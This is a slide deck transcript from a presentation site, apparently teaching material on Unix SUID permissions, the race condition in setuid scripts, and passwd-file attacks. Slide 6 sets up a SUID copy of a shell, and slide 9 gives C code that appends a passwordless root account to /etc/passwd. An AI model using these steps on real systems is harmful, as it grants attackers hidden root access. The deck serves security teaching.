Unix Permissions contd - PowerPoint PPT Presentation

1 / 9
About This Presentation
Title:

Unix Permissions contd

Description:

Cannot SUID script. It 'seems' that SUID for shells is not transitive for shell creation. i.e the SUID'd shell has the owners permissions but subsequently created ... – PowerPoint PPT presentation

Number of Views:31
Avg rating:3.0/5.0
Slides: 10
Provided by: knig9
Category:

less

Transcript and Presenter's Notes

Title: Unix Permissions contd


1
Unix Permissions (contd)
  • More on SUID
  • passwd attacks

2
SUID attacks
  • Recall the following SGID attack
  • What happens with a SUID version in Slack 7?

3
Linux Security
  • Cannot SUID script
  • It seems that SUID for shells is not transitive
    for shell creation
  • i.e the SUIDd shell has the owners permissions
    but subsequently created shells have the runners
    permissions
  • Shells perform a sanity check?

4
Why no SUID for Script?
  • It is hard to write safe script
  • Race conditions

Linux ignores the setuid bit, because the current
method of invoking a script allows for a
race condition. This has been solved on other
Unix systems (like, say, Solaris) by
invoking the interpreter and passing it
an open file handle to the script instead of the
name of it, breaking the race
condition. From the perlsec man page
Beyond the obvious problems that
stem from giving special
privileges to systems as flexible as scripts, on
many versions of Unix, set-id
scripts are inherently insecure
right from the start. The problem is a race
condition in the kernel. Between
the time the kernel opens the file to
see which interpreter to run and when the
(now-set-id) interpreter turns
around and reopens the file to interpret
it, the file in question may have changed,
especially if you have symbolic
links on your system. hint symbolic
links and an suid script make it trivial to run
any program as the owner of the suid
script on such systems, of which Linkux
is one. Set up a symlink like foo-gt/sbin/rootly,
where rootly is an suid script. Then
run 'foo'... if you're quick and can point foo
at myrootshell between the time the
kernel decides to run perl (or sh or any
other !'ist script), myrootshell will run as
root... even though it's not suid.
5
system() command
  • This does not work?
  • This does

include ltstdlib.hgt main() system("cat
alicefile")
include ltstdio.hgt main() FILE fileptr int
c fopen(alicefile, r) while(
(cfgetc(fileptr) ! EOF) putchar(c)
6
Shell Security?
  • SUID on the last program works
  • This does not
  • bob does not get a shell with alices permission

cp /etc/sh /home/alice/shell chmod 4711
/home/alice/shell su bob /home/alice/shell
7
Abuse Exploit
8
Abuse Results
9
Password Exploit Instead
  • Try this

include ltstdio.hgtmain() FILE fileptr
fopen("/etc/passwd", "a") fprintf(fileptr,
"eve00,,,/root/bin/bash\n")
fclose(fileptr)
Write a Comment
User Comments (0)
About PowerShow.com
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2025 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The PowerPoint PPT presentation: "Unix Permissions contd" is the property of its rightful owner.
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!